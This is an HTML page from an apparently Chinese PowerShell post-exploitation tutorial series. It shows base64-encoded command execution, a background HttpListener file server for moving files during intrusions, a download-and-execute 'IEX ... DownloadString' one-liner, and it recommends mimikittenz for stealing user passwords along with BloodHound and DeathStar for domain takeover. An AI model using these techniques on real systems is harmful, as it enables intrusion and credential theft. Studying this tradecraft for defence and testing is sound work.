
<!DOCTYPE HTML>
<html lang="" >
    <head>
        <meta charset="UTF-8">
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <title>实例使用场景 · GitBook</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="description" content="">
        <meta name="generator" content="GitBook 3.2.3">
        
        
        
    
    <link rel="stylesheet" href="gitbook/style.css">

    
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-highlight/website.css">
                
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-search/search.css">
                
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-fontsettings/website.css">
                
            
        

    

    
        
    
        
    
        
    
        
    
        
    
        
    

        
    
    
    <meta name="HandheldFriendly" content="true"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon-precomposed" sizes="152x152" href="gitbook/images/apple-touch-icon-precomposed-152.png">
    <link rel="shortcut icon" href="gitbook/images/favicon.ico" type="image/x-icon">

    
    <link rel="next" href="13. Framework.html" />
    
    
    <link rel="prev" href="ldap-pian/README.md" />
    

    </head>
    <body>
        
<div class="book">
    <div class="book-summary">
        
            
<div id="book-search-input" role="search">
    <input type="text" placeholder="Type to search" />
</div>

            
                <nav role="navigation">
                


<ul class="summary">
    
    

    

    
        
        
    
        <li class="chapter " data-level="1.1" data-path="./">
            
                <a href="./">
            
                    
                    前言
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2" data-path="kerberos/README.md">
            
                <span>
            
                    
                    基础篇
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.2.1" data-path="2. 基础.html">
            
                <a href="2. 基础.html">
            
                    
                    基础知识
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.2" data-path="3. 脚本编写与执行.html">
            
                <a href="3. 脚本编写与执行.html">
            
                    
                    脚本编写与执行
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.3" data-path="4. Scoket网络编程.html">
            
                <a href="4. Scoket网络编程.html">
            
                    
                    Scoket网络编程
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.4" data-path="5. 端口扫描与服务爆破.html">
            
                <a href="5. 端口扫描与服务爆破.html">
            
                    
                    端口扫描与服务爆破
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.5" data-path="6. 多线程.html">
            
                <a href="6. 多线程.html">
            
                    
                    多线程
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1.3" data-path="ntlm-pian/README.md">
            
                <span>
            
                    
                    进阶篇
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.3.1" data-path="7. WMI对象操作.html">
            
                <a href="7. WMI对象操作.html">
            
                    
                    WMI&dot-net对象操作
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.2" data-path="8. Win32API.html">
            
                <a href="8. Win32API.html">
            
                    
                    Win32API
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.3" data-path="9. Dll注入&shellcode注入&exe注入.html">
            
                <a href="9. Dll注入&shellcode注入&exe注入.html">
            
                    
                    注入操作
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.4" data-path="10. 混淆.html">
            
                <a href="10. 混淆.html">
            
                    
                    混淆
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.5" data-path="11. 日志操作.html">
            
                <a href="11. 日志操作.html">
            
                    
                    日志操作
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1.4" data-path="ldap-pian/README.md">
            
                <span>
            
                    
                    应用篇
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter active" data-level="1.4.1" data-path="12. 实例使用场景.html">
            
                <a href="12. 实例使用场景.html">
            
                    
                    实例使用场景
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.4.2" data-path="13. Framework.html">
            
                <a href="13. Framework.html">
            
                    
                    Framework
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    

    

    <li class="divider"></li>

    <li>
        <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
            Published with GitBook
        </a>
    </li>
</ul>


                </nav>
            
        
    </div>

    <div class="book-body">
        
            <div class="body-inner">
                
                    

<div class="book-header" role="navigation">
    

    <!-- Title -->
    <h1>
        <i class="fa fa-circle-o-notch fa-spin"></i>
        <a href="." >实例使用场景</a>
    </h1>
</div>




                    <div class="page-wrapper" tabindex="-1" role="main">
                        <div class="page-inner">
                            
<div id="book-search-results">
    <div class="search-noresults">
    
                                <section class="normal markdown-section">
                                
                                <h1 id="powershell12-&#x5B9E;&#x4F8B;&#x4F7F;&#x7528;&#x573A;&#x666F;">Powershell(12)-&#x5B9E;&#x4F8B;&#x4F7F;&#x7528;&#x573A;&#x666F;</h1>
<blockquote>
<p>&#x672C;&#x7BC7;&#x4E3A;Powershell&#x653B;&#x51FB;&#x6307;&#x5357;&#x2014;&#x2014;&#x9ED1;&#x5BA2;&#x540E;&#x6E17;&#x900F;&#x4E4B;&#x9053;&#x7CFB;&#x5217;&#x4E4B;&#x5B9E;&#x6218;&#x7BC7;&#xFF0C;&#x4E3B;&#x8981;&#x4ECB;&#x7ECD;&#x7684;&#x4E00;&#x4E9B;&#x5B9E;&#x7528;&#x7684;&#x5229;&#x7528;&#x65B9;&#x5F0F;&#x4E0E;&#x5229;&#x7528;&#x573A;&#x666F;&#x548C;&#x4E00;&#x4E9B;&#x5B9E;&#x7528;&#x5DE5;&#x5177;&#x3002;</p>
</blockquote>
<p>&#x5728;&#x5B9E;&#x9645;&#x7684;&#x6E17;&#x900F;&#x73AF;&#x5883;&#x4E2D;&#x6211;&#x4EEC;&#x5229;&#x7528;Powershell&#x7684;&#x65B9;&#x5F0F;&#x65E0;&#x975E;&#x4E24;&#x79CD;&#xFF1A;</p>
<ol>
<li>&#x4F7F;&#x7528;&#x7F16;&#x7801;&#x7684;&#x65B9;&#x5F0F;&#x5BF9;Powershell&#x547D;&#x4EE4;&#x8FDB;&#x884C;&#x7F16;&#x7801;&#x4E4B;&#x540E;&#x8FD0;&#x884C;</li>
<li>&#x8FDC;&#x7A0B;&#x4E0B;&#x8F7D;Powershell&#x4EE3;&#x7801;&#x4E4B;&#x540E;&#x76F4;&#x63A5;&#x8FD0;&#x884C;</li>
</ol>
<p>&#x4E24;&#x79CD;&#x65B9;&#x5F0F;&#x5404;&#x6709;&#x5229;&#x5F0A;&#xFF0C;&#x7B2C;&#x4E00;&#x79CD;&#x6BD4;&#x8F83;&#x65B9;&#x4FBF;&#x76F4;&#x63A5;&#x7F16;&#x7801;&#x5373;&#x53EF;&#x6267;&#x884C;&#xFF0C;&#x7B2C;&#x4E8C;&#x79CD;&#x9700;&#x8981;&#x5230;&#x4E00;&#x53F0;&#x62E5;&#x6709;&#x516C;&#x7F51;IP&#x7684;&#x673A;&#x5668;&#xFF0C;&#x90A3;&#x4E48;&#x5728;&#x5B9E;&#x9645;&#x7684;&#x6E17;&#x900F;&#x73AF;&#x5883;&#x4E2D;&#x5982;&#x4F55;&#x9009;&#x62E9;&#x5C31;&#x5F97;&#x770B;&#x5177;&#x4F53;&#x573A;&#x666F;&#x4E86;&#x3002;&#x4E0B;&#x9762;&#x770B;&#x770B;&#x4E24;&#x79CD;&#x5B9E;&#x4F8B;&#xFF1A;</p>
<h2 id="&#x901A;&#x8FC7;&#x7F16;&#x7801;&#x7684;&#x65B9;&#x5F0F;&#x6267;&#x884C;">&#x901A;&#x8FC7;&#x7F16;&#x7801;&#x7684;&#x65B9;&#x5F0F;&#x6267;&#x884C;</h2>
<p>&#x6211;&#x4EEC;&#x505A;&#x4E00;&#x4E2A;&#x6700;&#x7B80;&#x5355;&#x7684;&#x4F8B;&#x5B50;:</p>
<p>&#x4F7F;&#x7528;&#x7F16;&#x7801;&#x7684;&#x65B9;&#x5F0F;&#x6267;&#x884C;<code>whoami</code>&#x547D;&#x4EE4;&#xFF0C;&#x6211;&#x4EEC;&#x9996;&#x5148;&#x4F7F;&#x7528;&#x4E0B;&#x9762;&#x7684;&#x547D;&#x4EE4;&#x6765;&#x8FDB;&#x884C;&#x7F16;&#x7801;</p>
<pre><code class="lang-powershell"><span class="hljs-variable">$command</span> = <span class="hljs-string">&quot;whoami&quot;</span> 
<span class="hljs-variable">$bytes</span> = [System.Text.Encoding]::Unicode.GetBytes(<span class="hljs-variable">$command</span>) 
<span class="hljs-variable">$encodedCommand</span> = [Convert]::ToBase64String(<span class="hljs-variable">$bytes</span>) 
echo <span class="hljs-variable">$encodedCommand</span>
</code></pre>
<p>&#x8FD9;&#x4E32;&#x4EE3;&#x7801;&#x6267;&#x884C;&#x5B8C;&#x4E4B;&#x540E;&#x5C31;&#x4F1A;&#x6253;&#x5370;&#x51FA;&#x7F16;&#x7801;&#x7ED3;&#x679C;&#xFF0C;&#x4E4B;&#x540E;&#x76F4;&#x63A5;&#x6267;&#x884C;&#x5373;&#x53EF;<code>powershell.exe -EncodedCommand $encodedCommand</code></p>
<p>&#x5B8C;&#x6574;&#x8FC7;&#x7A0B;&#x5982;&#x4E0B;:
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/op/1.png" alt=""></p>
<h2 id="&#x642D;&#x5EFA;&#x5C0F;&#x578B;http&#x670D;&#x52A1;&#x5668;">&#x642D;&#x5EFA;&#x5C0F;&#x578B;HTTP&#x670D;&#x52A1;&#x5668;</h2>
<blockquote>
<p>Powershell&#x642D;&#x5EFA;HTTP&#x670D;&#x52A1;&#x5668;&#x5728;&#x771F;&#x5B9E;&#x7684;&#x6E17;&#x900F;&#x73AF;&#x5883;&#x4E2D;&#x4F7F;&#x7528;&#x7387;&#x662F;&#x8F83;&#x9AD8;&#x7684;&#xFF0C;&#x6BD4;&#x5982;&#x8BF4;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x76F4;&#x63A5;&#x7684;Get&#x4E00;&#x4E2A;&#x6587;&#x4EF6;&#x800C;&#x4F7F;&#x7528;SMB&#x6216;&#x8005;FTP&#x662F;&#x4E0D;&#x63A8;&#x8350;&#x7684;&#xFF0C;&#x52A8;&#x9759;&#x592A;&#x5927;&#x4E5F;&#x8F83;&#x96BE;&#x642D;&#x5EFA;&#xFF0C;&#x800C;&#x4F7F;&#x7528;HTTP&#x5219;&#x6CA1;&#x6709;&#x8FD9;&#x6837;&#x7684;&#x56F0;&#x96BE;&#xFF0C;&#x4E5F;&#x53EF;&#x4EE5;&#x642D;&#x5EFA;&#x5728;&#x5185;&#x7F51;&#x4F7F;&#x7528;Powershell&#x811A;&#x672C;&#x7684;&#x670D;&#x52A1;&#x5668;&#x3002;</p>
<p>&#x90A3;&#x4E48;&#x5F88;&#x591A;&#x4EBA;&#x4F1A;&#x8BF4;Python&#x5C31;&#x597D;&#x4E86;&#x554A;&#xFF0C;<code>-m SimpleHTTPServer</code>&#x5C31;&#x597D;&#x4E86;&#xFF0C;&#x4F46;&#x662F;&#x5BF9;&#x4E8E;Windows&#x64CD;&#x4F5C;&#x7CFB;&#x7EDF;&#x5E76;&#x6CA1;&#x6709;&#x90A3;&#x4E48;&#x7684;Python&#x73AF;&#x5883;&#x4F9B;&#x4F60;&#x4F7F;&#x7528;&#xFF0C;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x7684;&#x662F;&#x6700;&#x5C11;&#x7684;&#x64CD;&#x4F5C;&#x505A;&#x6700;&#x591A;&#x7684;&#x4E8B;&#x60C5;&#xFF0C;&#x5229;&#x7528;Windows&#x81EA;&#x5E26;&#x7684;&#x8F6F;&#x4EF6;&#x6216;&#x6587;&#x4EF6;&#x662F;&#x6211;&#x4EEC;&#x7684;&#x6700;&#x4F73;&#x9009;&#x62E9;&#xFF0C;&#x6240;&#x4EE5;Powershell&#x662F;&#x6211;&#x4EEC;&#x7684;&#x4E0D;&#x4E8C;&#x4E4B;&#x9009;</p>
</blockquote>
<h3 id="httplistener-api">HTTPListener-API</h3>
<p>&#x90A3;&#x4E48;&#x642D;&#x5EFA;HTTP&#x670D;&#x52A1;&#x5668;&#x4E5F;&#x662F;&#x8C03;&#x7528;&#x4E86;API&#xFF0C;&#x4F7F;&#x7528;&#x5230;&#x4E86;.Net&#x7684;API---HttpListener&#xFF0C;&#x6211;&#x4EEC;&#x53EA;&#x9700;&#x8981;&#x50CF;&#x8FD9;&#x6837;&#x8C03;&#x7528;<code>New-Object Net.HttpListener</code>&#x90A3;&#x4E48;&#x6211;&#x4EEC;&#x5C31;&#x53EF;&#x4EE5;&#x5F97;&#x5230;&#x4E00;&#x4E2A;.Net&#x5BF9;&#x8C61;&#xFF0C;&#x4E0B;&#x9762;&#x6211;&#x4EEC;&#x76F4;&#x63A5;&#x770B;&#x770B;&#x4EE3;&#x7801;&#xFF1A;</p>
<pre><code class="lang-powershell"><span class="hljs-comment"># This script will execute in background</span>
start-job { 
    <span class="hljs-variable">$p</span>=<span class="hljs-string">&quot;c:\temp\&quot;</span>
    <span class="hljs-comment"># $p = Get-Location &#x53EF;&#x4EE5;&#x83B7;&#x53D6;&#x5F53;&#x524D;&#x7528;&#x6237;&#x7684;&#x76EE;&#x5F55;&#xFF0C;&#x5982;&#x679C;&#x8FD9;&#x6837;&#x4F7F;&#x7528;&#x540E;&#x9762;&#x7684;$p&#x6539;&#x4E3A;$p.path</span>
    <span class="hljs-variable">$H</span>=<span class="hljs-built_in">New-Object</span> Net.HttpListener
    <span class="hljs-variable">$H</span>.Prefixes.Add(<span class="hljs-string">&quot;http://+:8889/&quot;</span>)
    <span class="hljs-variable">$H</span>.Start()
    <span class="hljs-keyword">While</span> (<span class="hljs-variable">$H</span>.IsListening) {
        <span class="hljs-variable">$HC</span>=<span class="hljs-variable">$H</span>.GetContext()
        <span class="hljs-variable">$HR</span>=<span class="hljs-variable">$HC</span>.Response
        <span class="hljs-variable">$HR</span>.Headers.Add(<span class="hljs-string">&quot;Content-Type&quot;</span>,<span class="hljs-string">&quot;text/plain&quot;</span>)

        <span class="hljs-variable">$file</span>=<span class="hljs-built_in">Join-Path</span> <span class="hljs-variable">$p</span> (<span class="hljs-variable">$HC</span>.Request).RawUrl
        <span class="hljs-variable">$text</span>=[IO.File]::ReadAllText(<span class="hljs-variable">$file</span>)
        <span class="hljs-variable">$text</span>=[Text.Encoding]::UTF8.GetBytes(<span class="hljs-variable">$text</span>)

        <span class="hljs-variable">$HR</span>.ContentLength64 = <span class="hljs-variable">$text</span>.Length
        <span class="hljs-variable">$HR</span>.OutputStream.Write(<span class="hljs-variable">$text</span>,<span class="hljs-number">0</span>,<span class="hljs-variable">$text</span>.Length)
        <span class="hljs-variable">$HR</span>.Close()
    }
    <span class="hljs-variable">$H</span>.Stop()
}
</code></pre>
<p>&#x90A3;&#x4E48;&#x4EE3;&#x7801;&#x4E5F;&#x4E0D;&#x957F;&#xFF0C;&#x76F4;&#x63A5;&#x8FD0;&#x884C;&#x5C31;&#x80FD;&#x5728;&#x540E;&#x53F0;&#x8FD0;&#x884C;&#xFF0C;Powershell&#x4F1A;&#x8FD4;&#x56DE;&#x4E00;&#x4E2A;&#x4EFB;&#x52A1;ID
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/http/1.png" alt=""></p>
<p>&#x5982;&#x679C;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x505C;&#x6B62;&#x8FD9;&#x4E2A;HTTP&#xFF0C;&#x53EA;&#x9700;&#x8981;Stop&#x5373;&#x53EF;&#xFF1A;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/http/2.png" alt=""></p>
<p>&#x90A3;&#x4E48;&#x6211;&#x4EEC;&#x53EA;&#x9700;&#x8981;&#x4FEE;&#x6539;&#x6211;&#x4EEC;&#x7684;&#x76EE;&#x5F55;&#x5373;&#x53EF;&#x5BF9;&#x76F8;&#x5E94;&#x7684;&#x76EE;&#x5F55;&#x8FDB;&#x884C;&#x8BBF;&#x95EE;&#x4E0E;&#x4E0B;&#x8F7D;&#xFF0C;&#x975E;&#x5E38;&#x65B9;&#x4FBF;&#x3002;</p>
<h3 id="&#x8FDC;&#x7A0B;&#x52A0;&#x8F7D;&#x6267;&#x884C;">&#x8FDC;&#x7A0B;&#x52A0;&#x8F7D;&#x6267;&#x884C;</h3>
<p>&#x76F4;&#x63A5;&#x770B;&#x770B;&#x547D;&#x4EE4;:
<code>powershell &quot;IEX (New-Object Net.WebClient).DownloadString(&apos;http://127.0.0.1/httptest.ps1&apos;);&quot;</code></p>
<p>&#x6211;&#x4EEC;&#x53EA;&#x9700;&#x8981;&#x5728;&#x672C;&#x5730;&#x5F00;&#x4E00;&#x4E2A;Web&#x670D;&#x52A1;&#xFF0C;&#x90A3;&#x4E48;&#x8FD9;&#x5C31;&#x5F88;&#x597D;&#x5F00;&#x4E86;&#xFF1A;&#x901A;&#x8FC7;Python&#x6216;&#x8005;&#x5176;&#x4ED6;&#x7684;&#x65B9;&#x5F0F;&#x90FD;&#x53EF;&#x4EE5;&#xFF0C;&#x81EA;&#x5DF1;&#x7684;&#x673A;&#x5668;&#x600E;&#x4E48;&#x4FEE;&#x6539;&#x90FD;&#x53EF;&#x4EE5;&#x3002;&#x4E4B;&#x540E;&#x901A;&#x8FC7;&#x4E0A;&#x9762;&#x7684;&#x547D;&#x4EE4;&#x4E0B;&#x8F7D;&#x4F60;&#x7684;&#x811A;&#x672C;&#x5373;&#x53EF;&#xFF0C;&#x8FD9;&#x6837;&#x5C31;&#x53EF;&#x4EE5;&#x4E0B;&#x8F7D;&#x5E76;&#x6267;&#x884C;&#x4E86;&#x3002;&#x90A3;&#x4E48;&#x8FD8;&#x53EF;&#x4EE5;&#x548C;&#x4E0A;&#x9762;&#x7F16;&#x7801;&#x7684;&#x65B9;&#x5F0F;&#x5E76;&#x7528;&#xFF0C;&#x5C31;&#x80FD;&#x66F4;&#x597D;&#x7684;&#x6267;&#x884C;&#x4E86;&#x3002;</p>
<h3 id="&#x5B9E;&#x4F8B;&#x5DE5;&#x5177;">&#x5B9E;&#x4F8B;&#x5DE5;&#x5177;</h3>
<p>&#x4E0B;&#x9762;&#x63A8;&#x8350;&#x4E00;&#x4E9B;&#x6BD4;&#x8F83;&#x597D;&#x7684;&#x5DE5;&#x5177;&#xFF0C;&#x7C7B;&#x4F3C;Powersploit&#x6216;&#x8005;nishang&#x6709;&#x7684;&#x5185;&#x5BB9;&#x5C31;&#x4E0D;&#x63D0;&#x53CA;&#x4E86;&#xFF0C;&#x5C31;&#x63D0;&#x51E0;&#x4E2A;&#x7ECF;&#x5E38;&#x4F7F;&#x7528;&#x7684;&#x5DE5;&#x5177;&#x3002;</p>
<h4 id="mimikittenz">mimikittenz</h4>
<p>&#x7B2C;&#x4E00;&#x4E2A;&#x662F;<a href="https://github.com/putterpanda/mimikittenz" target="_blank">mimikittenz</a>&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x80FD;&#x591F;&#x83B7;&#x53D6;&#x5230;&#x7528;&#x6237;&#x7EA7;&#x7684;&#x5BC6;&#x7801;&#xFF0C;&#x6BD4;&#x5982;Deopbox&#xFF0C;jira&#xFF0C;Gmail&#x7B49;&#x7B49;&#xFF0C;&#x5BF9;&#x4E8E;&#x771F;&#x5B9E;&#x7684;&#x6E17;&#x900F;&#x73AF;&#x5883;&#x6765;&#x8BF4;&#xFF0C;&#x9700;&#x6C42;&#x8FD8;&#x662F;&#x633A;&#x5927;&#x7684;&#xFF0C;&#x4E0B;&#x9762;&#x662F;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x63D0;&#x4F9B;&#x7684;&#x8FD0;&#x884C;&#x622A;&#x56FE;&#x3002;</p>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/op/2.png" alt=""></p>
<h4 id="bloodhound">BloodHound</h4>
<p><a href="https://github.com/BloodHoundAD/BloodHound" target="_blank">&#x94FE;&#x63A5;</a>
&#x4E2D;&#x6587;&#x540D;&#x730E;&#x72AC;&#xFF0C;&#x5148;&#x8BF4;&#x8BF4;&#x80FD;&#x5E72;&#x561B;&#x5427;&#xFF1A;&#x5185;&#x7F51;&#x4FE1;&#x606F;&#x57DF;&#x5185;&#x5173;&#x7CFB;&#x4E0E;&#x7EC6;&#x8282;&#x6574;&#x7406;&#xFF0C;&#x8FD9;&#x4E2A;&#x5DE5;&#x5177;&#x4E5F;&#x662F;&#x4F5C;&#x4E3A;DEFCON 24&#x7684;&#x514D;&#x8D39;&#x5F00;&#x6E90;&#x5DE5;&#x5177;&#x53D1;&#x5E03;&#xFF0C;&#x4E3B;&#x8981;&#x4F7F;&#x7528;&#x4E86;&#x56FE;&#x8BBA;&#x7684;&#x4E00;&#x4E9B;&#x77E5;&#x8BC6;&#xFF0C;&#x63A8;&#x8350;&#x5B66;&#x4E60;&#x3002;</p>
<h4 id="deathstar">DeathStar</h4>
<p><a href="https://github.com/byt3bl33d3r/DeathStar" target="_blank">&#x94FE;&#x63A5;</a>
&#x4E2D;&#x6587;&#x540D;&#x6B7B;&#x661F;&#xFF0C;&#x4E00;&#x770B;&#x540D;&#x5B57;&#x5C31;&#x77E5;&#x9053;&#x662F;&#x4E2A;StarWar&#x8FF7;:)&#xFF0C;&#x4E5F;&#x80FD;&#x770B;&#x51FA;&#x4ED6;&#x7684;&#x5A01;&#x529B;&#x6548;&#x679C;&#xFF0C;&#x4E0B;&#x9762;&#x662F;&#x5B98;&#x65B9;&#x4E00;&#x5F20;gif&#x4F7F;&#x7528;&#x6548;&#x679C;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/op/3.gif" alt=""></p>
<p>&#x8FD9;&#x6B3E;&#x5DE5;&#x5177;&#x9700;&#x8981;&#x914D;&#x5408;Empire&#x7684;API&#xFF0C;&#x4E0B;&#x9762;<a href="https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html" target="_blank">&#x94FE;&#x63A5;</a>&#x662F;&#x4F5C;&#x8005;&#x7684;&#x6559;&#x7A0B;&#xFF0C;&#x5927;&#x5BB6;&#x53EF;&#x4EE5;&#x81EA;&#x884C;&#x7814;&#x7A76;&#x3002;</p>
<h3 id="&#x5F00;&#x53D1;&#x5DE5;&#x5177;">&#x5F00;&#x53D1;&#x5DE5;&#x5177;</h3>
<p>&#x5DE5;&#x6B32;&#x5584;&#x5176;&#x4E8B;&#xFF0C;&#x5FC5;&#x5148;&#x5229;&#x5176;&#x5668;&#x3002;&#x8FD9;&#x91CC;&#x63D0;&#x4E00;&#x4E0B;Ps&#x7684;&#x5F00;&#x53D1;&#x5DE5;&#x5177;&#x4F9B;&#x5927;&#x5BB6;&#x9009;&#x62E9;&#x3002;</p>
<h4 id="ise">ISE</h4>
<p>&#x90A3;&#x4E48;&#x6700;&#x57FA;&#x7840;&#x7684;&#x662F;Ps&#x7684;ISE&#xFF0C;&#x8FD9;&#x4E2A;&#x5DE5;&#x5177;&#x662F;&#x81EA;&#x5E26;&#x7684;&#xFF0C;&#x901A;&#x8FC7;&#x4E0B;&#x9762;&#x7684;&#x65B9;&#x5F0F;&#x6253;&#x5F00;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/op/4.png" alt=""></p>
<p>&#x6253;&#x5F00;&#x7684;&#x754C;&#x9762;&#x5982;&#x4E0B;&#xFF1A;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/op/5.png" alt="">
&#x8BED;&#x6CD5;&#x9AD8;&#x4EAE;&#xFF0C;&#x5916;&#x52A0;&#x4E00;&#x4E2A;&#x4FBF;&#x4E8E;&#x590D;&#x5236;&#x548C;&#x7C98;&#x8D34;&#x64CD;&#x4F5C;&#x7684;&#x56FE;&#x5F62;&#x5316;&#x63A7;&#x5236;&#x53F0;&#xFF0C;&#x53EF;&#x4EE5;&#x8BF4;&#x662F;&#x975E;&#x5E38;&#x7684;&#x65B9;&#x4FBF;&#x3002;</p>
<h4 id="powershell-studio--visual-studio">PowerShell Studio &amp; Visual Studio</h4>
<p>&#x4F46;&#x5982;&#x679C;&#x4F60;&#x662F;&#x4E00;&#x4E2A;&#x9700;&#x8981;&#x66F4;&#x4E13;&#x4E1A;&#x7684;&#x5F00;&#x53D1;&#x73AF;&#x5883;&#xFF0C;&#x8FD9;&#x6B3E;&#x5DE5;&#x5177;&#x80AF;&#x5B9A;&#x80FD;&#x5E2E;&#x5230;&#x4F60;&#xFF0C;&#x5B98;&#x7F51;&#x5728;<a href="https://www.sapien.com/software/powershell_studio" target="_blank">&#x8FD9;&#x91CC;</a>&#xFF0C;&#x7B80;&#x5355;&#x770B;&#x770B;&#x4ED6;&#x7684;&#x4E00;&#x5F20;&#x622A;&#x56FE;:
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/op/6.png" alt=""></p>
<p>&#x53EF;&#x4EE5;&#x770B;&#x5230;&#x8F6F;&#x4EF6;&#x662F;&#x975E;&#x5E38;&#x4E13;&#x4E1A;&#x7684;&#xFF0C;&#x975E;&#x5E38;&#x7684;&#x65B9;&#x4FBF;&#x7F16;&#x5199;&#x4E0E;&#x7BA1;&#x7406;&#x4F60;&#x7684;&#x4EE3;&#x7801;&#x3002;</p>
<p><a href="https://marketplace.visualstudio.com/items?itemName=AdamRDriscoll.PowerShellToolsforVisualStudio2015" target="_blank">Visual Studio</a>&#x540C;&#x610F;&#x4E5F;&#x80FD;&#x8FBE;&#x5230;&#x8FD9;&#x6837;&#x7684;&#x6548;&#x679C;&#xFF0C;&#x90A3;&#x4E48;&#x5927;&#x5BB6;&#x53EF;&#x4EE5;&#x81EA;&#x884C;&#x9009;&#x62E9;&#x3002;</p>

                                
                                </section>
                            
    </div>
    <div class="search-results">
        <div class="has-results">
            
            <h1 class="search-results-title"><span class='search-results-count'></span> results matching "<span class='search-query'></span>"</h1>
            <ul class="search-results-list"></ul>
            
        </div>
        <div class="no-results">
            
            <h1 class="search-results-title">No results matching "<span class='search-query'></span>"</h1>
            
        </div>
    </div>
</div>

                        </div>
                    </div>
                
            </div>

            
                
                <a href="ldap-pian/README.md" class="navigation navigation-prev " aria-label="Previous page: 应用篇">
                    <i class="fa fa-angle-left"></i>
                </a>
                
                
                <a href="13. Framework.html" class="navigation navigation-next " aria-label="Next page: Framework">
                    <i class="fa fa-angle-right"></i>
                </a>
                
            
        
    </div>

    <script>
        var gitbook = gitbook || [];
        gitbook.push(function() {
            gitbook.page.hasChanged({"page":{"title":"实例使用场景","level":"1.4.1","depth":2,"next":{"title":"Framework","level":"1.4.2","depth":2,"path":"13. Framework.md","ref":"13. Framework.md","articles":[]},"previous":{"title":"应用篇","level":"1.4","depth":1,"path":"ldap-pian/README.md","ref":"ldap-pian/README.md","articles":[{"title":"实例使用场景","level":"1.4.1","depth":2,"path":"12. 实例使用场景.md","ref":"12. 实例使用场景.md","articles":[]},{"title":"Framework","level":"1.4.2","depth":2,"path":"13. Framework.md","ref":"13. Framework.md","articles":[]}]},"dir":"ltr"},"config":{"gitbook":"*","theme":"default","variables":{},"plugins":["livereload"],"pluginsConfig":{"livereload":{},"highlight":{},"search":{},"lunr":{"maxIndexSize":1000000,"ignoreSpecialCharacters":false},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2},"theme-default":{"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"},"showLevel":false}},"structure":{"langs":"LANGS.md","readme":"README.md","glossary":"GLOSSARY.md","summary":"SUMMARY.md"},"pdf":{"pageNumbers":true,"fontSize":12,"fontFamily":"Arial","paperSize":"a4","chapterMark":"pagebreak","pageBreaksBefore":"/","margin":{"right":62,"left":62,"top":56,"bottom":56}},"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"}},"file":{"path":"12. 实例使用场景.md","mtime":"2020-04-13T09:48:14.583Z","type":"markdown"},"gitbook":{"version":"3.2.3","time":"2020-04-13T09:56:21.455Z"},"basePath":".","book":{"language":""}});
        });
    </script>
</div>

        
    <script src="gitbook/gitbook.js"></script>
    <script src="gitbook/theme.js"></script>
    
        
        <script src="gitbook/gitbook-plugin-livereload/plugin.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-search/search-engine.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-search/search.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-lunr/lunr.min.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-lunr/search-lunr.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-sharing/buttons.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-fontsettings/fontsettings.js"></script>
        
    

    </body>
</html>

